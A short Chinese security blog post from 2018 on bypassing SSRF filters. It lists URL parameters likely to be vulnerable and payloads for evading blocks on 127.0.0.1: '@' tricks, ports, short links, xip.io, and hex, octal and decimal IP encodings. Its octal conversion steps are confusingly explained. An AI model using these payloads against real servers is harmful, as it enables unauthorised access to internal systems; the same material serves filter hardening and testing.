关注我们

SSRF中的绕过姿势

LzersLzers 安全文摘 2018-05-11 234414 0

从以下URL关键字中寻找SSRF漏洞:

[sourcecode language="plain"]
share
wap
url
link
src
source
target
u
3g
display
sourceURl
imageURL
domain
...
[/sourcecode]

http://127.0.0.1/ 被过滤的时候,可以尝试一下几种方式:
1、@

[sourcecode language="plain"]http://abc@127.0.0.1[/sourcecode]

2、添加端口号

[sourcecode language="plain"]http://127.0.0.1:8080[/sourcecode]

3、短地址

[sourcecode language="plain"]http://dwz.cn/11SMa[/sourcecode]

4、可以指向任意ip的域名:xip.io

[sourcecode language="plain"]
10.0.0.1.xip.io 10.0.0.1
www.10.0.0.1.xip.io 10.0.0.1
mysite.10.0.0.1.xip.io 10.0.0.1
foo.bar.10.0.0.1.xip.io 10.0.0.1
[/sourcecode]

5、ip地址转换成进制来访问

[sourcecode language="plain"]115.239.210.26 = 16373751032[/sourcecode]

首先把这四段数字给 转成 16 进制!结果:73 ef d2 1a 然后把 73efd21a 这十六进制一起转换成8进制!访问使用http://00+转换后十六进制

[sourcecode language="plain"]115.239.210.26 = 0x73.0xef.0xd2.0x1a[/sourcecode]

八进制

[sourcecode language="plain"]115.239.210.26 = 0163.0357.0322.0032[/sourcecode]


版权声明

本文仅代表作者观点,不代表黑白网立场。
如文章侵犯了您的权利,请通过邮箱联系我们删除。
详情查看:版权纠纷
E-Mail:server@heibai.org

喜欢0评论已闭